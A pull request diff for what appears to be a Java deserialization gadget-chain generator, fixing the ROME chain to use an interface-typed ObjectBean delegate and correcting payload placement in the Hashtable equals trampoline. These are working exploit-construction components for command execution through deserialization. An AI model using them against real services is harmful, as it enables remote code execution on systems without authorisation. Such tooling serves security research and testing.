### PR TITLE
[Issue#4] fixed ROME to use interface for delegate and HashtableEqual

### DIFF
--- a/gadgetbuilder-chains1/src/main/java/org/ses/gadgetbuilder/chains1/ROME.java
+++ b/gadgetbuilder-chains1/src/main/java/org/ses/gadgetbuilder/chains1/ROME.java
@@ -8,6 +8,8 @@ import org.ses.gadgetbuilder.annotations.Impact;
 import org.ses.gadgetbuilder.chains.main.MethodInvokeGadgetChain;
 import org.ses.gadgetbuilder.chains.main.TrampolineConnector;
 import org.ses.gadgetbuilder.chains.trampolines.noparam.HashCodeTrampoline;
+import org.ses.gadgetbuilder.exceptions.AdapterMismatchException;
+
 import javax.xml.transform.Templates;
 import java.lang.reflect.Method;
 
@@ -23,7 +25,14 @@ public class ROME extends MethodInvokeGadgetChain<HashCodeTrampoline, GetterMeth
     protected TrampolineConnector createPayload(String command) throws Exception {
         Object o = this.methodInvokeAdapter.getInvocationTarget(command);
 
-        ObjectBean delegate = new ObjectBean(o.getClass(), o);
+        Class targetInterface = this.methodInvokeAdapter.getTargetInterface();
+
+        if (targetInterface == null) {
+            throw new AdapterMismatchException("Spring gadget chain requires a sink method adapter class that has interfaces " +
+                    "corresponding to the to be invoked methods. This is not the case for " + this.methodInvokeAdapter.getClass().getSimpleName());
+        }
+
+        ObjectBean delegate = new ObjectBean(targetInterface, o);
         ObjectBean root  = new ObjectBean(ObjectBean.class, delegate);
 
         return new TrampolineConnector(root);

--- a/gadgetbuilder-impl/src/main/java/org/ses/gadgetbuilder/impl/trampolines/equals/HashtableEquals.java
+++ b/gadgetbuilder-impl/src/main/java/org/ses/gadgetbuilder/impl/trampolines/equals/HashtableEquals.java
@@ -17,8 +17,8 @@ public class HashtableEquals implements EqualsTrampoline {
         Hashtable map1 = new Hashtable(); // Hashtable
         Hashtable map2 = new Hashtable();
         map1.put("yy",param);
-        map1.put("zZ",param);
-        map2.put("yy",param);
+        map1.put("zZ",payload);
+        map2.put("yy",payload);
         map2.put("zZ",param);
 
         // Hashtable.Entry


### PR DESCRIPTION
- Corrected wrong assignment in HashtableEquals according to [original JDD-PoCLearning](https://github.com/BofeiC/JDD-PocLearning/blob/3b6565f3b70550a2e96c6aa72c1a3a39ad766051/src/main/java/gadgetFragment/Entry2EqualFragment.java)
- updated ROME to use supertype as delegate